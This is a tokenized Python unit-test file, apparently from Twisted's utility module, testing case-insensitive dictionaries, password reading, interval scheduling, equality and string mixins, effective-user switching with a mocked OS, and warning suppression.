'<STR_LIT:foo>' , dct ) <EOL> result = eval ( repr ( dct ) , { <EOL> '<STR_LIT>' : dct , <EOL> '<STR_LIT>' : util . InsensitiveDict , <EOL> } ) <EOL> self . assertEqual ( result , dct ) <EOL> keys = [ '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ] <EOL> for x in keys : <EOL> self . assertIn ( x , dct . keys ( ) ) <EOL> self . assertIn ( ( x , dct [ x ] ) , dct . items ( ) ) <EOL> self . assertEqual ( len ( keys ) , len ( dct ) ) <EOL> del dct [ <NUM_LIT:1> ] <EOL> del dct [ '<STR_LIT:foo>' ] <EOL> self . assertEqual ( dct . keys ( ) , [ '<STR_LIT>' ] ) <EOL> def test_noPreserve ( self ) : <EOL> """<STR_LIT>""" <EOL> dct = util . InsensitiveDict ( { '<STR_LIT>' : '<STR_LIT:bar>' , <NUM_LIT:1> : <NUM_LIT:2> , '<STR_LIT>' : { <NUM_LIT:1> : <NUM_LIT:2> } } , preserve = <NUM_LIT:0> ) <EOL> keys = [ '<STR_LIT:foo>' , '<STR_LIT>' , <NUM_LIT:1> ] <EOL> for x in keys : <EOL> self . assertIn ( x , dct . keys ( ) ) <EOL> self . assertIn ( ( x , dct [ x ] ) , dct . items ( ) ) <EOL> self . assertEqual ( len ( keys ) , len ( dct ) ) <EOL> del dct [ <NUM_LIT:1> ] <EOL> del dct [ '<STR_LIT:foo>' ] <EOL> self . assertEqual ( dct . keys ( ) , [ '<STR_LIT>' ] ) <EOL> def test_unicode ( self ) : <EOL> """<STR_LIT>""" <EOL> d = util . InsensitiveDict ( preserve = False ) <EOL> d [ u"<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . assertEqual ( d [ u"<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( d . keys ( ) , [ u"<STR_LIT:foo>" ] ) <EOL> def test_bytes ( self ) : <EOL> """<STR_LIT>""" <EOL> d = util . InsensitiveDict ( preserve = False ) <EOL> d [ b"<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . assertEqual ( d [ b"<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( d . keys ( ) , [ b"<STR_LIT:foo>" ] ) <EOL> class PasswordTestingProcessProtocol ( ProcessProtocol ) : <EOL> """<STR_LIT>""" <EOL> def connectionMade ( self ) : <EOL> self . output = [ ] <EOL> self . transport . write ( b'<STR_LIT>' ) <EOL> def childDataReceived ( self , fd , output ) : <EOL> self . output . append ( ( fd , output ) ) <EOL> def processEnded ( self , reason ) : <EOL> self . finished . callback ( ( reason , self . output ) ) <EOL> class GetPasswordTests ( unittest . TestCase ) : <EOL> if not IReactorProcess . providedBy ( reactor ) : <EOL> skip = "<STR_LIT>" <EOL> def test_stdin ( self ) : <EOL> """<STR_LIT>""" <EOL> p = PasswordTestingProcessProtocol ( ) <EOL> p . finished = Deferred ( ) <EOL> reactor . spawnProcess ( <EOL> p , pyExe , <EOL> [ pyExe , <EOL> b'<STR_LIT:-c>' , <EOL> ( b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' ) ] , <EOL> env = { b'<STR_LIT>' : os . pathsep . join ( sys . path ) . encode ( "<STR_LIT:utf8>" ) } ) <EOL> def processFinished ( result ) : <EOL> ( reason , output ) = result <EOL> reason . trap ( ProcessDone ) <EOL> self . assertIn ( ( <NUM_LIT:1> , b'<STR_LIT>' ) , output ) <EOL> return p . finished . addCallback ( processFinished ) <EOL> class SearchUpwardsTests ( unittest . TestCase ) : <EOL> def testSearchupwards ( self ) : <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> actual = util . searchupwards ( '<STR_LIT>' , <EOL> files = [ '<STR_LIT>' ] , <EOL> dirs = [ '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> expected = os . path . abspath ( '<STR_LIT>' ) + os . sep <EOL> self . assertEqual ( actual , expected ) <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> actual = util . searchupwards ( '<STR_LIT>' , <EOL> files = [ '<STR_LIT>' ] , <EOL> dirs = [ '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> expected = None <EOL> self . assertEqual ( actual , expected ) <EOL> class IntervalDifferentialTests ( unittest . TestCase ) : <EOL> def testDefault ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> def testSingle ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> def testPair ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:5> , <NUM_LIT:7> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> def testTriple ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> def testInsert ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> d . addInterval ( <NUM_LIT:3> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> d . addInterval ( <NUM_LIT:6> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> def testRemove ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:3> , <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> d . removeInterval ( <NUM_LIT:3> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> d . removeInterval ( <NUM_LIT:5> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> self . assertRaises ( ValueError , d . removeInterval , <NUM_LIT:10> ) <EOL> class Record ( util . FancyEqMixin ) : <EOL> """<STR_LIT>""" <EOL> compareAttributes = ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> class DifferentRecord ( util . FancyEqMixin ) : <EOL> """<STR_LIT>""" <EOL> compareAttributes = ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> class DerivedRecord ( Record ) : <EOL> """<STR_LIT>""" <EOL> class EqualToEverything ( object ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return True <EOL> def __ne__ ( self , other ) : <EOL> return False <EOL> class EqualToNothing ( object ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> return True <EOL> class EqualityTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_identity ( self ) : <EOL> """<STR_LIT>""" <EOL> class Empty ( util . FancyEqMixin ) : <EOL> pass <EOL> self . assertFalse ( Empty ( ) == Empty ( ) ) <EOL> self . assertTrue ( Empty ( ) != Empty ( ) ) <EOL> empty = Empty ( ) <EOL> self . assertTrue ( empty == empty ) <EOL> self . assertFalse ( empty != empty ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_unequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_differentClassesEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DifferentRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_differentClassesInequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DifferentRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_inheritedClassesEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_inheritedClassesInequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_rightHandArgumentImplementsEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == EqualToEverything ( ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == EqualToNothing ( ) ) <EOL> def test_rightHandArgumentImplementsUnequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != EqualToEverything ( ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != EqualToNothing ( ) ) <EOL> class RunAsEffectiveUserTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , "<STR_LIT>" , None ) is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . geteuid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . getegid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . seteuid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . setegid ) <EOL> def _securedFunction ( self , startUID , startGID , wantUID , wantGID ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( wantUID == startUID or <EOL> wantUID == self . mockos . seteuidCalls [ - <NUM_LIT:1> ] ) <EOL> self . assertTrue ( wantGID == startGID or <EOL> wantGID == self . mockos . setegidCalls [ - <NUM_LIT:1> ] ) <EOL> def test_forwardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda : <NUM_LIT:1> ) <EOL> self . assertEqual ( result , <NUM_LIT:1> ) <EOL> def test_takeParameters ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda x : <NUM_LIT:2> * x , <NUM_LIT:3> ) <EOL> self . assertEqual ( result , <NUM_LIT:6> ) <EOL> def test_takesKeyworkArguments ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda x , y = <NUM_LIT:1> , z = <NUM_LIT:1> : x * y * z , <NUM_LIT:2> , z = <NUM_LIT:3> ) <EOL> self . assertEqual ( result , <NUM_LIT:6> ) <EOL> def _testUIDGIDSwitch ( self , startUID , startGID , wantUID , wantGID , <EOL> expectedUIDSwitches , expectedGIDSwitches ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . euid = startUID <EOL> self . mockos . egid = startGID <EOL> util . runAsEffectiveUser ( <EOL> wantUID , wantGID , <EOL> self . _securedFunction , startUID , startGID , wantUID , wantGID ) <EOL> self . assertEqual ( self . mockos . seteuidCalls , expectedUIDSwitches ) <EOL> self . assertEqual ( self . mockos . setegidCalls , expectedGIDSwitches ) <EOL> self . mockos . seteuidCalls = [ ] <EOL> self . mockos . setegidCalls = [ ] <EOL> def test_root ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , [ ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_UID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_GID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , [ ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> def test_UIDGID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> def _getDeprecationSuppression ( f ) : <EOL> """<STR_LIT>""" <EOL> return SUPPRESS ( <EOL> category = DeprecationWarning , <EOL> message = '<STR_LIT>' % ( fullyQualifiedName ( f ) , ) ) <EOL> class InitGroupsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . addCleanup ( setattr , util , "<STR_LIT>" , util . _initgroups ) <EOL> self . addCleanup ( setattr , util , "<STR_LIT>" , util . setgroups ) <EOL> def test_initgroupsInStdlib ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ ] <EOL> util . _initgroups = lambda x , y : calls . append ( ( x , y ) ) <EOL> setgroupsCalls = [ ] <EOL> util . setgroups = setgroupsCalls . append <EOL> util . initgroups ( os . getuid ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( calls , [ ( pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <NUM_LIT:4> ) ] ) <EOL> self . assertFalse ( setgroupsCalls ) <EOL> if util . _initgroups is None : <EOL> test_initgroupsInStdlib . skip = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DeprecationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_getPluginDirs ( self ) : <EOL> """<STR_LIT>""" <EOL> util . getPluginDirs ( ) <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_getPluginDirs ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> def test_addPluginDir ( self ) : <EOL> """<STR_LIT>""" <EOL> util . addPluginDir ( ) <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_addPluginDir ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> test_addPluginDir . suppress = [ <EOL> SUPPRESS ( category = DeprecationWarning , <EOL> message = "<STR_LIT>" ) <EOL> ] <EOL> class SuppressedWarningsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> runWithWarningsSuppressed = staticmethod ( util . runWithWarningsSuppressed ) <EOL> def test_runWithWarningsSuppressedFiltered ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . assertEqual ( [ ] , self . flushWarnings ( ) ) <EOL> def test_runWithWarningsSuppressedUnfiltered ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> [ "<STR_LIT>" ] , [ w [ '<STR_LIT:message>' ] for w in self . flushWarnings ( ) ] ) <EOL> def test_passThrough ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . runWithWarningsSuppressed ( [ ] , lambda : <NUM_LIT:4> ) , <NUM_LIT:4> ) <EOL> def test_noSideEffects ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , lambda : None ) <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> [ "<STR_LIT>" ] , [ w [ '<STR_LIT:message>' ] for w in self . flushWarnings ( ) ] ) <EOL> class FancyStrMixinTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_sequenceOfStrings ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> first = <NUM_LIT:1> <EOL> second = "<STR_LIT:hello>" <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_formatter ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( <EOL> "<STR_LIT>" , <EOL> ( "<STR_LIT>" , lambda value : repr ( value [ : : - <NUM_LIT:1> ] ) ) ) <EOL> first = "<STR_LIT:hello>" <EOL> second = "<STR_LIT>" <EOL> self . assertEqual ( "<STR_LIT>" , str ( Foo ( ) ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> first = <NUM_LIT:1> <EOL> second = <NUM_LIT> <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_fancybasename ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> fancybasename = "<STR_LIT>" <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> first = <NUM_LIT:1> <EOL> second = "<STR_LIT:hello>" <EOL> obj = Foo ( ) <EOL> self . assertEqual ( str ( obj ) , repr ( obj ) ) <EOL> class PadToTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_default ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:3> , [ ] ) <EOL> self . assertEqual ( [ None ] * <NUM_LIT:3> , padded ) <EOL> def test_specificDefaultValue ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:4> , [ ] , "<STR_LIT:x>" ) <EOL> self . assertEqual ( [ "<STR_LIT:x>" ] * <NUM_LIT:4> , padded ) 